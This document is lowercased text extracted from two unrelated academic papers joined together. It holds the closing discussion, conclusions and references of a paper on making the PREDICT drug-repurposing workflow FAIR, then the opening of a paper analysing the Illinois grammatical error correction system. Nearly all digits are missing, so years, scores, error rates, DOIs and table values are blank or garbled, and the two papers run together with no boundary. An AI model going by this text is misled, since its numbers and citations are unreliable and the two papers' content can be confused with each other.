inaccessible or missing data since no data except the gold standard data (drug–disease associations) were given, the features for the predict workflow were reconstructed using the publicly accessible databases drugbank and kegg and sider. however, we could not check if this resulted in exactly the same datasets. the original data that were available to the authors could be absent or no longer accessible to others for many reasons. sufficient data should be published to enable reproducing a study. . versioning and change of data in predict, publicly accessible datasets have been used to construct models and validate hypotheses for prediction of drug indications and drugs were identified by their drugbank ids. however, drugbank ids are subject to change over time. for example, two drugs (db , db ) in the original dataset were merged to the same drug within the current version of the drugbank. results or hypotheses may change as a result of updated input data. in order to reconstruct the original conclusion, it is important to record the version or the date of the data that were used in a study. this is especially important as publicly accessible datasets are increasingly used to construct models and validate hypotheses for prediction of drug indications. celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . execution environment and third-party dependencies in the predict study, the versions of some software tools, such as the library for semantic similarity calculation, were not specified. the versions of software libraries, packages and tools used in a workflow should be explicitly mentioned, and an effort must be made to maintain the access to those releases used in the original workflow. further issues encountered while the execution of the fairification process in the openpredict was straightforward, the semantic modelling of the unified workflow model was challenging. the reuse of existing semantic vocabularies for the representation of our unified model proved to be an extensive task. there are several existing semantic approaches to represent workflows that present reproducibility issues and different conceptualizations, sometimes overlapping in their terminology. computational workflow languages such as cwl and wdl do not intend to define a semantic representation for workflows that involve both manual and computational steps and enrich the workflows with sufficient metadata to make them fair. the prospective part of workflow ever implementation (wfdesc (https://raw.github.com/wf ever/ro/ . /wfdesc.owl)) has consistency issues such as missing disjointness and licensing elements, besides not conforming to the documentation (e.g., for all elements related to workflow templates). on the other hand, semantic models like dul, prov and p-plan presented higher quality and common foundations (in dolce), while being easier to reuse and extend. although cwlprov also provides an ontology-based on w ever semantic models, it is oriented only to retrospective provenance of computational steps, reusing most of the predicates that p-plan extends (from prov). furthermore, the uri (https://w id.org/cwl/prov#) does not provide a concrete description of the new predicates (e.g., cwlprov:image) and neither resolves to the rdf model (tbox). a question that may arise is whether it would be better to create a new ontology from scratch rather than creating a unified model based on the existing ontologies. 
we believe that high quality semantic models should be reused, taking benefit from the lessons learned. furthermore, we consider that reusing existing semantic workflow models actually improve semantic interoperability, while creating a new ontology may impede interoperability if it is not accompanied with alignments to the existing semantic models. therefore, our approach appears to lead to an improved semantic interoperability. because we reused several semantic models, the competency questions that they target are potentially addressed by our approach. for example, the gap in our approach regarding the representation of change management for versioning can be addressed by reusing some elements from the versioning approach of workflow ever, e.g., roevo:change, roevo:changespecification and roevo:versionableresource. deciding which type of approach should be used for role representation should be based on the needs for either a fine-grained definition of the role/relator pattern (a reified relationship), such as the prov:association approach, or a simple property, such as dc:creator. while the former ( ) enriches the definition of the role (an improved representation capability), the latter ( ) is less verbose: celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://raw.github.com/wf ever/ro/ . /wfdesc.owl https://w id.org/cwl/prov# http://dx.doi.org/ . /peerj-cs. ( ) ?association prov:agent opredict:remzi; prov:hadrole opredict:creator; prov:hadplan ?plan. ( ) ?plan dc:creator ’remzi ’ . one of the main challenges is to understand the different terminology used for similar conceptualizations. although the definitions of terms like plan, process, protocol, procedure, workflow, plan specification and standard operating procedure seem to be the same (or quite overlapping), their meanings become notoriously ambiguous across varied communities. how to grasp these semantic differences is a crucial question that needs further exploration. for example, in the bioinformatics community, the term workflow usually refer to an implemented (computational) piece of software, i.e., a set of programming language instructions, usually developed with a workflow management system as a workflow application (da cruz, campos & mattoso, ). meanwhile, in software engineering, the workflow term is usually referred to a detailed business process within the business process modelling (bpm) research. usually, the bpm languages conform to graphical notations (e.g., bpmn, epc, aris), targeted to human comprehension rather than computational ends (process design/modelling). additionally, some bpm languages focus on representing, at a lower level of abstraction, the process execution details, e.g., bpel (process implementation) (rosemann & vom brocke, ). this is a topic extensively covered by service oriented architecture (soa) initiatives. several related works target the gap that exists between business process models and workflow specifications and implementations, such as service composition schemes (stephan, thomas & manfred, ) and formal provenance of process executions and versioning (krishna, poizat & salan, ). furthermore, some of these languages provide predicades for forks and conditionals, which were intentionally not included in the unified model since they have a high complexity - it is still a topic under discussion in the cwl community, for example. 
in future work we will improve the modelling of manual steps by studying and possibly incorporating predicates from the smart protocols ontology. we will characterize the abstraction levels of workflows based on multi-level process modelling approaches, such as the widespread adopted apqc’s process classification framework (pcf). the pcf provides abstraction levels for process specification, from a high abstraction level to detailed workflow specification: category (level ), process group (level ), process (level ), activity (level ) and task (level ). although this framework aims at providing a methodological approach for business process specification, we should investigate whether the minimal information elements of each level require proper representation in the ontology. we should also consider the challenges of process refinement (’’process description in a more fine-grained representation’’) (ren et al., ). a process refinement mechanism maps and/or derives models from a higher-level specification to a detailed level, equivalent to vertical and exogenous model transformations in model-driven engineering. typical refinement categories will be investigated, such as activity decomposition principles about event delivery and execution condition transference (jiang et al., ; muehlen & celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. rosemann, ). the representation of intentionality of the activities within business processes will also be addressed in future work through goal-oriented semantic process modeling (horkoff et al., ), linking goals to activities and roles. industry-oriented approaches are also being investigated, such as extract, transform and loading (etl/elt) for data warehousing and sql server integration services, which considers a workflow as a control flow, while a dataflow transforms data from a source to a destination. furthermore, product line management (plm) tools should be investigated, especially the ones that cover laboratory information management system (lims), which provides important concepts such as bill-of-materials (bom), specifications and their certifications. for example, in plm a specification is a description of raw materials and packaging materials, and semi-finished and finished products. this description may contain product characteristics (e.g., chemical compounds), recipes (e.g., bom), production methods, quality norms and methods, artwork, documents and others. ultimately, initiatives like cwl, the center for expanded data annotation and retrieval (cedar) (for metadata management) (gonalves et al., ) and fairsharing.org (for indexing fair standards) may be used as building blocks for the envisioned fair workbench tool, which can be a reference implementation over a workflow system such as jupyter notebook (e.g., a plug-in). finally, the validation of the reproducibility level of a workflow should consider specific fair metrics that take in consideration specific recommendations (e.g., from cwlprov approach) and the practices for higher reproducibility of jupyter notebooks (pimentel et al., ). conclusions in this work, we examined how fair principles can be applied to scientific workflows. we adopted the fair principles to make the predict workflow, a drug repurposing workflow based on machine learning, open, reproducible, and interoperable. 
from this stems, the main contribution of this paper, the openpredict case study, which demonstrates how to make a machine learning workflow fair and open. to do this, we created a unified model that reuses several semantic models to show how a workflow can be semantically modeled. we published the workflow representation, data and meta-data in a triple store which was used as fair data point. in addition, new competency questions have been defined for fair workflows and how these questions can be answered through sparql queries. among the main lessons learned, we highlight how the main existing workflow modelling approaches can be reused and enhanced by our unified model. however, reusing these semantic models showed to be a challenging task, once they present reproducibility issues and different conceptualizations, sometimes overlapping in their terminology. in the future, we envision that the intensive human effort that we had to perform in order to make a workflow fair will be taken care of by smart and intuitive workflow tools. as a prototype of such a tool, we are currently developing the fair workbench as a general tool that allows users to deal with workflows and protocols in a semantic and fair form. celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work was supported by the dutch research council (nwo) (no. . . ) and the netherlands escience center (no.nlesc p . ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: dutch research council: . . . netherlands escience center (no. nlesc p . ): nlesc p . . competing interests the authors declare there are no competing interests. author contributions • remzi celebi and joao rebelo moreira conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • ahmed a. hassan analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • sandeep ayyar analyzed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. • lars ridder, tobias kuhn and michel dumontier conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and code are available at github: https://github.com/fair-workflows/openpredict. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ashburn tt, thor kb. . drug repositioning: identifying and developing new uses for existing drugs. nature reviews drug discovery ( ): – doi . /nrd . baker m. . , scientists lift the lid on reproducibility. nature ( ): – doi . / a. barrell d, dimmer e, huntley rp, binns d, odonovan c, apweiler r. . the goa database in —an integrated gene ontology annotation resource. nucleic acids research (suppl_ ):d –d . celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/fair-workflows/openpredict http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. 
#supplemental-information http://dx.doi.org/ . /nrd http://dx.doi.org/ . / a http://dx.doi.org/ . /peerj-cs. barrett t, edgar r. . gene expression omnibus: microarray data storage, submis- sion, retrieval, and analysis. in: methods in enzymology. vol. . united states: elsevier, – doi . /s - ( ) - . begley cg, ellis lm. . drug development: raise standards for preclinical cancer research. nature ( ): – doi . / a. belhajjame k, zhao j, garijo d, gamble m, hettne k, palma r, mina e, corcho o, gmez-pérez jm, bechhofer s, klyne g, goble c. . using a suite of ontologies for preserving workflow-centric research objects. journal of web semantics : – doi . /j.websem. . . . bisgin h, liu z, fang h, kelly r, xu x, tong w. . a phenome-guided drug repositioning through a latent variable model. bmc bioinformatics ( ): – doi . / - - - . bizer c, heath t, berners-lee t. . linked data-the story so far. international journal on semantic web and information systems ( ): – . borgo s, masolo c. . ontological foundations of dolce. in: poli r, healy m, kameas a, eds. theory and applications of ontology: computer applications. dordrecht: springer, – doi . / - - - - _ - - - - . callahan a, cruz-toledo j, dumontier m. . ontology-based querying with bio rdfs linked open data. journal of biomedical semantics ( ): – . caniza h, romero ae, paccanaro a. . a network medicine approach to quantify distance between hereditary disease modules on the interactome. scientific reports : . cheng f, liu c, jiang j, lu w, li w, liu g, zhou w, huang j, tang y. . prediction of drug-target interactions and drug repositioning via network-based inference. plos computational biology ( ):e doi . /journal.pcbi. . cohen-boulakia s, belhajjame k, collin o, chopard j, froidevaux c, gaignard a, hinsen k, larmande p, bras yl, lemoine f, mareuil f, mnager h, pradal c, blanchet c. . scientific workflows for computational reproducibility in the life sciences: status, challenges and opportunities. future generation computer systems : – doi . /j.future. . . . collins s, genova f, harrower n, hodson s, jones s, laaksonen l, mietchen d, petrauskaitė r, wittenburg p. . turning fair into reality: final report and action plan from the european commission expert group on fair data. doi . / . correa publio g, esteves d, lawrynowicz a, panov p, soldatova l, soru t, vanschoren j, zafar h. . ml-schema: exposing the semantics of machine learning with schemas and ontologies. in: reproducibility in machine learning workshop, icml. crowdflower. . data science report. available at https://visit.figure-eight.com/rs/ -zbe- /images/crowdflower_datasciencereport_ .pdf (accessed on october ). da cruz sms, campos mlm, mattoso m. . a foundational ontology to support scientific experiments. in: ceur workshop proceedings. – . celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / a http://dx.doi.org/ . /j.websem. . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - - - - _ - - - - http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . / https://visit.figure-eight.com/rs/ -zbe- /images/crowdflower_datasciencereport_ .pdf https://visit.figure-eight.com/rs/ -zbe- /images/crowdflower_datasciencereport_ .pdf http://dx.doi.org/ . /peerj-cs. garijo d, gil y. . augmenting prov with plans in p-plan: scientific processes as linked data. in: lisc@iswc. giraldo o, garcía a, lópez f, corcho o. . using semantics for representing experimental protocols. 
journal of biomedical semantics : article . gonalves rs, o’connor mj, martnez-romero m, egyedi al, willrett d, graybeal j, musen ma. . the cedar workbench: an ontology-assisted environment for authoring metadata that describe scientific experiments. in: the semantic web— iswc . doi . / - - - - _ . gottlieb a, stein gy, ruppin e, sharan r. . predict: a method for inferring novel drug indications with application to personalized medicine. molecular systems biology ( ): doi . /msb. . . gray ka, yates b, seal rl, wright mw, bruford ea. . genenames. org: the hgnc resources in . nucleic acids research (d ):d –d . guizzardi g, wagner g, almeida jpa, guizzardi rss. . towards ontological foundations for conceptual modeling: the unified foundational ontology (ufo) story. applied ontology ( – ): – doi . /ao- . hartanto ha, sarno r, ariyani nf. . warning criterion ontology for measuring of compliance in standard operating procedure implementation. journal of theoretical and applied information technology ( ): – . hettne k, wolstencroft k, belhajjame k, goble c, mina e, dharuri h, verdes- montenegro l, garrido j, de roure d, roos m. . best practices for workflow design: how to prevent workflow decay. in: ceur workshop proceedings, . hoehndorf r, hiebert t, hardy nw, schofield pn, gkoutos gv, dumontier m. . mouse model phenotypes provide information about human drug targets. bioinformatics ( ): – doi . /bioinformatics/btt . horkoff j, aydemir fb, cardoso e, li t, maté a, paja e, salnitri m, piras l, my- lopoulos j, giorgini p. . goal-oriented requirements engineering: an ex- tended systematic mapping study. requirements engineering ( ): – doi . /s - - -z. imming m, böhmer j, companjen b, emery t, groep d, murchison k, schoonhoven r, sesink l, som de cerff w, sterl a, franke w. . fair data advanced use cases: from principles to practice in the netherlands. zenodo. ioannidis jpa. a. contradicted and initially stronger effects in highly cited clinical research. jama ( ): – doi . /jama. . . . ioannidis jpa. b. why most published research findings are false. plos medicine ( ):e doi . /journal.pmed. . jacobsen a, kaliyaperumal r, da silva santos lob, mons b, schultes e, roos m, thompson m. . a generic workflow for the data fairification process. data intelligence : – . jiang y, xiao n, zhang y, zhang l. . a novel flexible activity refinement ap- proach for improving workflow process flexibility. computers in industry : – doi . /j.compind. . . . celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /msb. . http://dx.doi.org/ . /ao- http://dx.doi.org/ . /bioinformatics/btt http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /jama. . . http://dx.doi.org/ . /journal.pmed. http://dx.doi.org/ . /j.compind. . . http://dx.doi.org/ . /peerj-cs. kanehisa m, araki m, goto s, hattori m, hirakawa m, itoh m, katayama t, kawashima s, okuda s, tokimatsu t, yamanishi y. . kegg for linking genomes to life and the environment. nucleic acids research (database):d –d doi . /nar/gkm . khan fz, soiland-reyes s, sinnott ro, lonie a, goble c, crusoe mr. . sharing interoperable work ow provenance: a review of best practices and their practical application in cwlprov. gigascience – doi . /zenodo. . 
klein ra, ratliff ka, vianello m, adams jr rb, bahnǐk v, bernstein mj, bocian k, brandt mj, brooks b, brumbaugh cc, cemalcilar z, chandler j, cheong w, davis we, devos t, eisner m, frankowska n, furrow d, galliani em, hasselman f, hicks ja, hovermale jf, hunt sj, huntsinger jr, ijzerman h, john m-s, joy-gaba ja, barry kappes h, krueger le, kurtz j, levitan ca, mallett rk, morris wl, nelson aj, nier ja, packard g, pilati r, rutchick am, schmidt k, skorinko jl, smith r, steiner tg, storbeck j, van swol lm, thompson d, van ’t veer ae, vaughn la, vranka m, wichman al, woodzicka ja, nosek ba. . investigating variation in replicability: a ‘‘many labs’’ replication project. social psychology ( ): – doi . / - /a . krishna a, poizat p, salaün g. . checking business process evolution. science of computer programming : – doi . /j.scico. . . . kuhn m, campillos m, letunic i, jensen lj, bork p. . a side effect resource to capture phenotypic effects of drugs. molecular systems biology ( ): . lamb j, crawford ed, peck d, modell jw, blat ic, wrobel mj, lerner j, brunet j- p, subramanian a, ross kn, reich m, hieronymus h, wei g, armstrong sa, haggarty sj, clemons pa, wei r, carr sa, lander es, golub tr. . the connectivity map: using gene-expression signatures to connect small molecules, genes, and disease. science ( ): – doi . /science. . lamprecht a-l, garcia l, kuzak m, martinez c, arcila r, martin del pico e, dominguez del angel v, van de sandt s, ison j, martinez pa, mcquilton p, valencia a, harrow j, psomopoulos f, gelpi jl, chue hong n, goble c, capella- gutierrez s. . towards fair principles for research software. data science ( ): – doi . /ds- . lebo t, sahoo s, mcguinness d, belhajjame k, cheney j, corsar d, garijo d, soiland- reyes s, zednik s, zhao j. . prov-o: the prov ontology. w c. available at https://www.w .org/tr/prov-o/#:~:text=the% prov% ontology% (prov% do,systems% and% under% different% contexts. menche j, sharma a, kitsak m, ghiassian sd, vidal m, loscalzo j, barabási a-l. . uncovering disease-disease relationships through the incomplete interactome. science ( ): . moreau l, freire j, futrelle j, mcgrath re, myers j, paulson p. . the open prove- nance model: an overview. in: international provenance and annotation workshop. springer, – . moreira jlr, sales tp, guerson j, braga bfb, brasileiro f, sobral v. . menthor editor: an ontology-driven conceptual modeling platform. in: jowo@fois. celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nar/gkm http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . / - /a http://dx.doi.org/ . /j.scico. . . http://dx.doi.org/ . /science. http://dx.doi.org/ . /ds- https://www.w .org/tr/prov-o/#:~:text=the% prov% ontology% (prov% do,systems% and% under% different% contexts https://www.w .org/tr/prov-o/#:~:text=the% prov% ontology% (prov% do,systems% and% under% different% contexts http://dx.doi.org/ . /peerj-cs. muehlen m. z, rosemann m. . multi-paradigm process management. in: caise workshops. – . neil ch, daniel sk. . fair enough? can we (already) benefit from applying the fair data principles to software? available at https://figshare.com/articles/fair_ enough_can_we_already_benefit_from_applying_the_fair_data_principles_to_ software_/ doi . /m .figshare. .v . noy nf, shah nh, whetzel pl, dai b, dorf m, griffith n, jonquet c, rubin dl, storey m-a, chute cg, musen ma. . bioportal: ontologies and integrated data re- sources at the click of a mouse. nucleic acids research (web server):w –w doi . /nar/gkp . 
pimentel jf, murta l, braganholo v, freire j. . a large-scale study about quality and reproducibility of jupyter notebooks. in: proceedings of the th international conference on mining software repositories. ieee press, – . prinz f, schlange t, asadullah k. . believe it or not: how much can we rely on pub- lished data on potential drug targets? nature reviews drug discovery ( ): – doi . /nrd -c . ren y, grner g, lemcke j, rahmani t, friesen a, zhao y, pan jz, staab s. . process refinement validation and explanation with ontology reasoning. service- oriented computing, berlin: springer, – . rosemann m, vom brocke j. . the six core elements of business process man- agement. in: vom brocke j, rosemann m, eds. handbook on business process management : introduction, methods, and information systems. berlin, heidelberg: springer, – doi . / - - - - _ - - - - . rospocher m, ghidini c, serafini l. . an ontology for the business process modelling notation. formal ontology in information systems - proceedings of the eighth international conference, fois , september, – , , rio de janeiro, brazil. ios press – . samuel s, könig-ries b. a. combining p-plan and the reproduce-me ontology to achieve semantic enrichment of scientific experiments using interactive note- books. in: european semantic web conference. springer, – . samuel s, könig-ries b. b. provbook: provenance-based semantic enrichment of interactive notebooks for reproducibility. in: proceedings of the iswc posters demonstrations, industry and blue sky ideas tracks co-located with iswc. scannell jw, blanckley a, boldon h, warrington b. . diagnosing the decline in pharmaceutical r&d efficiency. nature reviews drug discovery ( ): – doi . /nrd . sirota m, dudley jt, kim j, chiang ap, morgan aa, sweet-cordero a, sage j, butte aj. . discovery and preclinical validation of drug indications using compendia of public gene expression data. science translational medicine ( ): ra – ra doi . /scitranslmed. . sleigh sh, barton cl. . repurposing strategies for therapeutics. pharmaceutical medicine ( ): – doi . /bf . celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://figshare.com/articles/fair_enough_can_we_already_benefit_from_applying_the_fair_data_principles_to_software_/ https://figshare.com/articles/fair_enough_can_we_already_benefit_from_applying_the_fair_data_principles_to_software_/ https://figshare.com/articles/fair_enough_can_we_already_benefit_from_applying_the_fair_data_principles_to_software_/ http://dx.doi.org/ . /m .figshare. .v http://dx.doi.org/ . /nar/gkp http://dx.doi.org/ . /nrd -c http://dx.doi.org/ . / - - - - _ - - - - http://dx.doi.org/ . /nrd http://dx.doi.org/ . /scitranslmed. http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. soiland-reyes s, khan fz, sinnott r, lonie a, crusoe mr, goble c. . capturing interoperable reproducible workflows. in: workshop on research objects: workshop at ieee escience . stephan b, thomas b, manfred r. . bridging the gap between business process models and service composition specifications. in: jonathan l, shang-pin m, alan l, eds. service life cycle tools and technologies: methods, trends and advances. hershey: igi global, – doi . / - - - - .ch . vasilevsky na, brush mh, paddock h, ponting l, tripathy sj, larocca gm, haendel ma. . on the reproducibility of science: unique identification of research resources in the biomedical literature. peerj :e –e doi . /peerj. . 
wilkinson md, dumontier m, aalbersberg ij, appleton g, axton m, baak a, blomberg n, boiten j-w, da silva santos lb, bourne pe, bouwman j, brookes aj, clark t, crosas m, dillo i, dumon o, edmunds s, evelo ct, finkers r, gonzalez- beltran a, gray a. jg, groth p, goble c, grethe js, heringa j, t hoen p. ac, hooft r, kuhn t, kok r, kok j, lusher sj, martone me, mons a, packer al, persson b, rocca-serra p, roos m, van schaik r, sansone s-a, schultes e, sengstag t, slater t, strawn g, swertz ma, thompson m, van der lei j, van mulligen e, velterop j, waagmeester a, wittenburg p, wolstencroft k, zhao j, mons b. . the fair guiding principles for scientific data management and stewardship. nature : doi . /sdata. . . wishart ds, knox c, guo ac, cheng d, shrivastava s, tzur d, gautam b, hassanali m. . drugbank: a knowledgebase for drugs, drug actions and drug targets. nucleic acids research (suppl_ ):d –d . wu c, gudivada rc, aronow bj, jegga ag. . computational drug repositioning through heterogeneous network clustering. bmc systems biology (suppl ):s –s doi . / - - -s -s . celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - .ch http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /sdata. . http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /peerj-cs. building a state-of-the-art grammatical error correction system alla rozovskaya center for computational learning systems columbia university new york, ny alla@ccls.columbia.edu dan roth department of computer science university of illinois urbana, il danr@illinois.edu abstract this paper identifies and examines the key principles underlying building a state-of-the- art grammatical error correction system. we do this by analyzing the illinois system that placed first among seventeen teams in the re- cent conll- shared task on grammatical error correction. the system focuses on five different types of errors common among non-native english writers. we describe four design principles that are relevant for correcting all of these er- rors, analyze the system along these dimen- sions, and show how each of these dimensions contributes to the performance. introduction the field of text correction has seen an increased interest in the past several years, with a focus on correcting grammatical errors made by english as a second language (esl) learners. three competi- tions devoted to error correction for non-native writ- ers took place recently: hoo- (dale and kil- garriff, ), hoo- (dale et al., ), and the conll- shared task (ng et al., ). the most recent and most prominent among these, the conll- shared task, covers several common esl errors, including article and preposition usage mistakes, mistakes in noun number, and various verb errors, as illustrated in fig. . seventeen teams that the conll- shared task that completed at the time of writing this paper was an extension of the conll- com- petition (ng et al., ) but addressed all types of errors. the illinois-columbia submission, a slightly extended version of the nowadays *phone/phones *has/have many functionalities, *included/including *∅/a camera and *∅/a wi-fi receiver. figure : examples of representative esl errors. participated in the task developed a wide array of ap- proaches that include discriminative classifiers, lan- guage models, statistical machine-translation sys- tems, and rule-based modules. 
many of the systems also made use of linguistic resources such as addi- tional annotated learner corpora, and defined high- level features that take into account syntactic and se- mantic knowledge. even though the systems incorporated similar re- sources, the scores varied widely. the top system, from the university of illinois, obtained an f score of . , while the second team scored . and the median result was . points. these results suggest that there is not enough understanding of what works best and what elements are essential for building a state-of-the-art error correction system. in this paper, we identify key principles for build- ing a robust grammatical error correction system and show their importance in the context of the shared task. we do this by analyzing the illinois system and evaluating it along several dimensions: choice illinois conll- system, ranked at the top. for a descrip- tion of the illinois-columbia submission, we refer the reader to rozovskaya et al. ( a). the state-of-the-art performance of the illinois system dis- cussed here is with respect to individual components for differ- ent errors. improvements in rozovskaya and roth ( ) over the illinois system that are due to joint learning and inference are orthogonal, and the analysis in this paper still applies there. f might not be the ideal metric for this task but this was the one chosen in the evaluation. see more in sec. . transactions of the association for computational linguistics, ( ) – . action editor: alexander koller. submitted / ; revised / ; published / . c© association for computational linguistics. of learning algorithm; choice of training data (native or annotated learner data); model adaptation to the mistakes made by the writers; and the use of linguis- tic knowledge. for each dimension, several imple- mentations are compared, including, when possible, approaches chosen by other teams. we also vali- date the obtained results on another learner corpus. overall, this paper makes two contributions: ( ) we explain the success of the illinois system, and ( ) we provide an understanding and qualitative analysis of different dimensions that are essential for success in this task, with the goal of aiding future research on it. given that the illinois system has been the top system in four competitive evaluations over the last few years (hoo and conll), we believe that the analysis we propose will be useful for researchers in this area. in the next section, we present the conll- competition. sec. gives an overview of the ap- proaches adopted by the top five teams. sec. de- scribes the illinois system. in sec. , the analysis of the illinois system is presented. sec. offers a brief discussion, and sec. concludes the paper. task description the conll- shared task focuses on five common mistakes made by esl writers: arti- cle/determiner, preposition, noun number, verb agreement, verb form. the training data of the shared task is the nucle corpus (dahlmeier et al., ), which contains essays written by learners of english (we also refer to it as learner data or shared task training data). the test data consists of essays by students from the same linguistic back- ground. the training and the test data contain . m and k words, respectively. table shows the number of errors by type and the error rates. determiner errors are the most com- mon and account for . % of all errors in training. note that the test data contains a much larger pro- portion of annotated mistakes; e.g. 
determiner errors occur four times more often in the test data than in the training data (only . % of noun phrases in the training data have determiner errors, versus % in the test data). the differences might be attributed to differences in annotation standards, annotators, or writers, as the test data was annotated at a later time. the shared task provided two sets of test an- error number of errors and error rates train test art. ( . %) ( . %) prep. ( . %) ( . %) noun ( . %) ( . %) verb agr. ( . %) ( . %) verb form ( . %) ( . %) table : statistics on annotated errors in the conll- shared task data. percentage denotes the error rates, i.e. the number of erroneous instances with respect to the total number of relevant instances in the data. notations: the original annotated data and a set with additional revisions that also includes alternative an- notations proposed by participants. clearly, having alternative answers is the right approach as there are typically multiple ways to correct an error. how- ever, because the alternatives are based on the error analysis of the participating systems, the revised set may be biased (ng et al., ). consequently, we report results on the original set. model dimensions table summarizes approaches and methodologies of the top five systems. the prevailing approach consists in building a statistical model either on learner data or on a much larger corpus of native en- glish data. for native data, several teams make use of the web t -gram corpus (henceforth web t, (brants and franz, )). nara employs a statis- tical machine translation model for two error types; two systems have rule-based components for se- lected errors. based on the analysis of the illinois system, we identify the following, inter-dependent, dimensions that will be examined in this work: . learning algorithm: most of the teams, includ- ing illinois, built statistical models. we show that the choice of the learning algorithm is very impor- tant and affects the performance of the system. . adaptation to learner errors: previous stud- ies, e.g. (rozovskaya and roth, ) showed that adaptation, i.e. developing models that utilize knowledge about error patterns of the non-native writers, is extremely important. we summarize adaptation techniques proposed earlier and examine their impact on the performance of the system. . linguistic knowledge: it is essential to use some linguistic knowledge when developing error correc- tion modules, e.g., to identify which type of verb system error approach illinois (rozovskaya et al., ) art. ap model on nucle with word, pos, shallow parse features prep. nb model trained on web t and adapted to learner errors noun/agr./form nb model trained on web t nthu (kao et al., ) all count model with backoff trained on web t hit (xiang et al., ) art./prep./noun me on nucle with word, pos, dependency features agr./form rule-based nara (yoshimoto et al., ) art./prep. smt model trained on learner data from lang- corpus noun me model on nucle with word, pos and dependency features agr./form treelet lm on gigaword and penn treebank corpora umc (xing et al., ) art./prep. two lms – on nucle and web t corpus – with voting noun rules and me model on nucle + lm trained on web t agr./form me model on nucle (agr.) and rules (form) table : top systems in the conll- shared task. the second column indicates the error type; the third column describes the approach adopted by the system. 
me stands for maximum entropy; lm stands for language model; smt stands for statistical machine translation; ap stands for averaged perceptron; nb stands for naı̈ve bayes. classifier art. prep. noun agr. form train k k k k k test k . k . k . k . k table : number of candidate words by classifier type. error occurs in a given context, before the appropri- ate correction module is employed. we describe and evaluate the contribution of these elements. . training data: we discuss the advantages of training on learner data or native english data in the context of the shared task and in broader context. the illinois system the illinois system consists of five machine-learning models, each specializing in correcting one of the er- rors described above. the words that are selected as input to a classifier are called candidates (table ). in the preposition system, for example, candidates are determined by surface forms. in other systems, determining the candidates might be more involved. all modules take as input the corpus documents pre-processed with a part-of-speech tagger (even- zohar and roth, ) and shallow parser (pun- yakanok and roth, ). in the illinois submis- sion, some modules are trained on native data, oth- ers on learner data. the modules trained on learner data make use of a discriminative algorithm, while http://cogcomp.cs.illinois.edu/page/ software view/pos http://cogcomp.cs.illinois.edu/page/ software view/chunker native-trained modules make use of the naı̈ve bayes (nb) algorithm. the illinois system has an option for a post-processing step where corrections that al- ways result in a false positive in training are ignored but this option is not used here. . determiner errors the majority of determiner errors involve articles, although some errors also involve pronouns. the illinois system addresses only article errors. can- didates include articles (“a”,“an”,“the”) and omis- sions, by considering noun-phrase-initial contexts where an article is likely to be omitted. the con- fusion set for articles is thus {a, the, ∅}. the ar- ticle classifier is the same as the one in the hoo shared tasks (rozovskaya et al., ; rozovskaya et al., ), where it demonstrated superior per- formance. it is a discriminative model that makes use of the averaged perceptron algorithm (ap, (fre- und and schapire, )) implemented with lbjava (rizzolo and roth, ) and is trained on learner data with rich features and adaptation to learner er- rors. see sec. . and sec. . . . preposition errors similar to determiners, we distinguish three types of preposition mistakes: choosing an incorrect prepo- sition, using a superfluous preposition, and omitting a preposition. in contrast to determiners, for learn- ers of many first language backgrounds, most of the preposition errors are replacements, i.e., where the the variants “a” and “an” are collapsed to one class. “hence, the environmental factors also *contributes/ contribute to various difficulties, *giving/given prob- lems in nuclear technology.” error confusion set agr. {inf=contribute, s=contributes} form {inf=give, ed=given, ing=giving, s=gives } table : confusion sets for agreement and form. for irreg- ular verbs, the second candidate in the confusion set for verb form is the past participle. author correctly recognized the need for a prepo- sition, but chose the wrong one (leacock et al., ). 
however, learner errors depend on the first language; in nucle, spurious prepositions occur more frequently: % versus % of all preposition mistakes in other learner corpora (rozovskaya and roth, a; yannakoudakis et al., ). the illinois preposition classifier is a nb model trained on web t that uses word n-gram features in the -word window around the preposition. the -word window refers to the four words before and the four words after the preposition, e.g. “problem as the search of alternative resources to the” for the preposition “of”. features consist of word n-grams of various lengths spanning the target preposition. for example, “the search of” is a -gram feature. the model is adapted to likely preposition confu- sions using the priors method (see sec. . ). the illinois model targets replacement errors of the most common english prepositions. here we aug- ment it to identify spurious prepositions. the con- fusion set for prepositions is as follows: {in, of, on, for, to, at, about, with, from, by, into, during, ∅}. . agreement and form errors the illinois system implements two verb modules – agreement and form – that consist of the following components: ( ) candidate identification; ( ) deter- mining the relevant module for each candidate based on verb finiteness; ( ) correction modules for each error type. the confusion set for verbs depends on the target word and includes its morphological vari- ants (table ). for irregular verbs, the past partici- ple form is included, while the past tense form is not (i.e. “given” is included but “gave” is not), 